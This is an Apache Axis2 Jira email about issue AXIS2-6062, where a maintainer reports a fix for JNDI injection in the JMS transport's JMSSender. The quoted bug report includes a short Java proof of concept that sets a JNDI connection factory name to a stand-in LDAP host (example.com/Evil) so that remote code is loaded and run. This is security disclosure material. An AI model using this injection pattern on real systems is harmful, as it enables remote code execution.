[
https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17925784#comment-17925784
]
Robert Lazarski commented on AXIS2-6062:
----------------------------------------
Thanks for bringing this issue to our attention. I made the following commit,
which passes our unit tests.
https://github.com/apache/axis-axis2-java-core/commit/3b2aeee3712a2b3269fdbda38e4c2315f59c5027
I am marking this issue closed, which will go out soon with 2.0.0.
> Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol
> in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
> Key: AXIS2-6062
> URL: https://issues.apache.org/jira/browse/AXIS2-6062
> Project: Axis2
> Issue Type: Bug
> Components: JMS transport
> Affects Versions: 1.8.2
> Reporter: Letian Yuan
> Assignee: Robert Lazarski
> Priority: Critical
> Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method,
> `{{{}org.apache.axis2.transport.jms.JMSSender.invoke{}}}`, designed to send a
> JMS message. However, if we send a JMS message like this:
>
> {{ MessageContext context = new MessageContext();}}
> {{ context.setProperty("TransportURL",
> "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil";);}}
> {{ JMSSender sender = new JMSSender();}}
> {{ sender.invoke(context);}}
>
> Then, arbitrary commands from remote server "ldap://example.com/Evil"; would
> be executed.
> We want to discuss with you about it.
> First, excecuting arbitrary commands from remote server is quite dangerous.
> Second, as far as we know, no one would use LDAP protocol to get
> `{{{}ConnectionFactory{}}}`.
> Third, it seem this behavior has not been documented in your “User’s Guide”,
> so library users might not know this API of sending JMS messages can be used
> to execute arbitrary commands. So, I think that library users are very
> possible to misuse this API. For example, concatenating user input to the
> parameter of `{{{}invoke{}}}`. Or, making the parameter of `{{{}invoke{}}}`
> available in a configuration file such as `{{{}foobar.properties{}}}`. We
> know that such cases rarely happen and might not be your design purpose, but
> it is possible anyway. As long as an attacker can control the parameter of
> `{{{}invoke{}}}`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether
> it is necessary for LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: java-dev-unsubscr...@axis.apache.org
For additional commands, e-mail: java-dev-h...@axis.apache.org
